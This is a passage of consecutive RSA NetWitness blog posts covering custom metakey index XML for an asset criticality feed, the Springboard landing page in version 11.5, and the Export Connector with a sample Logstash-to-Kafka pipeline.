192.168.50.100,1,authentication,domain controller,hnmscwdc-03,20200708,mscwdc-03
10.0.0.16,1,network,core switch,hnlcsw-01,20200708,hqdc-01

 

Customizing Index

Now that the metakey names and values have been established, they can be added to the necessary custom index files so that they are available to the analyst in Investigate.

 

Log/Network Decoders

There are two metakeys that are defined as integers, so we need to tell the Log or Network Decoder that these metakeys are to be formatted as integers.

The following custom index files need to be modified with the entries below:

index-logdecoder-custom.xml (Log Decoder)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet Lab Custom metakeys *** -->
<key description="HNL Asset Criticality" name="hnl.asset.crit" format="UInt8" level="IndexNone"/>
<key description="HNL Asset Date" name="hnl.asset.date" format="UInt32" level="IndexNone"/>

index-decoder-custom.xml (Network Decoder)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet Lab Custom metakeys *** -->
<key description="HNL Asset Criticality" name="hnl.asset.crit" singleton="true" format="UInt8" level="IndexNone"/>
<key description="HNL Asset Date" name="hnl.asset.date" singleton="true" format="UInt32" level="IndexNone"/>

Concentrators

All of the custom metakeys will need to be added to the Concentrator to be available in Investigate for the analysts.

The following custom index file needs to be modified with the entries below.

index-concentrator-custom.xml (Concentrator)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet custom index keys added to provide additional information from feeds *** -->

<key description="HNL Asset Criticality" name="hnl.asset.crit" singleton="true" format="UInt8" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Category" name="hnl.asset.cat" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Role" name="hnl.asset.role" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Hostname" name="hnl.asset.host" singleton="true" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Date Added" name="hnl.asset.date" singleton="true" format="UInt32" level="IndexValues" valueMax="100"/>
<key description="HNL Asset Location" name="hnl.asset.loc" singleton="true" format="Text" level="IndexValues" valueMax="50"/>

 

Now you have more information than just an IP address to look at, thanks to the taxonomy and a Business Context Feed.
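
As a quick illustration, once the feed is deployed and generating meta, the Domain Controller lookup from the beginning of this post reduces to a simple query sketch using the example values above:

hnl.asset.crit=1 && hnl.asset.role='domain controller'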

 

As of RSA NetWitness Platform 11.5, analysts have a new landing page option to help them determine where to start upon login.  We call this new landing page Springboard.  In 11.5 it becomes the new default starting page upon login (adjustable) and can be accessed from any screen simply by clicking the RSA logo on the top left. 

 

The Springboard is a specialized dashboard (independent of the existing "Dashboard" functionality) designed as a starting place where analysts can quickly see the variety of risks, threats, and most important events in their environment.  From the Springboard, analysts can drill into any of the leads presented in each panel and be taken directly to the appropriate product screen with the relevant filter pre-applied, saving time and streamlining the analysis process.  

 

As part of the 11.5 release, Springboard comes with five pre-configured (adjustable) panels that will be populated with the "Top 25" results in each category, depending on the components and data available:

 

Top Incidents - Sorted by descending priority.  Requires the use of the Respond module.

Top Alerts -  Sorted by descending severity, whether or not they are part of an Incident. Requires the use of the Respond module.

Top Risky Hosts -  Sorted by descending risk score.  Requires RSA NetWitness Endpoint.

Top Risky Users - Sorted by descending risk score.  Requires RSA UEBA.

Top Risky Files - Sorted by descending risk score. Requires RSA NetWitness Endpoint.

 

Springboard administrators can also create custom panels, up to a total of ten, of a sixth type that aggregates "Events" based on any existing saved query profile used in the Investigate module.  This only requires the core RSA NetWitness Platform, with data being sourced from the underlying NetWitness Database (NWDB).  This enables organizations to add their own starting places for analysts that go beyond the defaults, and to customize the landing experience to match the deployed RSA NetWitness Platform components:

 

Example of custom Springboard Panel creation using Event data

 

For more details on management of the Springboard, please see: NW: Managing the Springboard 

 

And as always, if you have any feedback or ideas on how we can improve Springboard or anything else in the product, please submit your ideas via the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform  

RSA is pleased to announce the availability of the NetWitness Export Connector, which enables customers to export NetWitness Platform events and route the data wherever they want, all in a continuous, streaming fashion, providing the flexibility to satisfy a variety of use cases. 

 

This plugin is installed on Logstash and integrates with NetWitness Platform Decoders and Log Decoders. It aggregates metadata and raw logs from the Decoder or Log Decoder and converts them to a Logstash JSON object, which can easily integrate with numerous consumers such as Kafka, AWS S3, TCP, Elastic, and others.

 

Work Flow of NetWitness Export Connector 

 

  • The input plugin collects metadata and raw logs from the Log Decoder, and metadata from the Decoder. The data is then forwarded to the Filter plugin.
  • The Filter plugin adds, removes, or modifies the received data and forwards it to the Output plugin.
  • The Output plugin sends the processed event data to the consumer destinations. You can use the standard Logstash output plugins to forward the data; a minimal pipeline sketch follows below.
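
To make the workflow concrete, below is a minimal pipeline sketch. It is an illustration only: the stdin input is a stand-in for the Export Connector input plugin (its actual name and options are covered in the documentation linked below), while the mutate filter and kafka output are standard Logstash plugins.

# Illustrative Logstash pipeline - the input block is a placeholder.
input {
  # Stand-in for the NetWitness Export Connector input plugin;
  # see the product documentation for its real name and settings.
  stdin { }
}
filter {
  # Add, remove, or modify fields before forwarding downstream.
  mutate {
    add_field => { "pipeline.source" => "netwitness" }
  }
}
output {
  # Standard logstash-output-kafka plugin as an example consumer.
  kafka {
    bootstrap_servers => "kafka01.example.com:9092"
    topic_id => "netwitness-events"
  }
}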

 

Check it out and let us know what you think!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

 

Download and Documentation

https://community.rsa.com/docs/DOC-114086
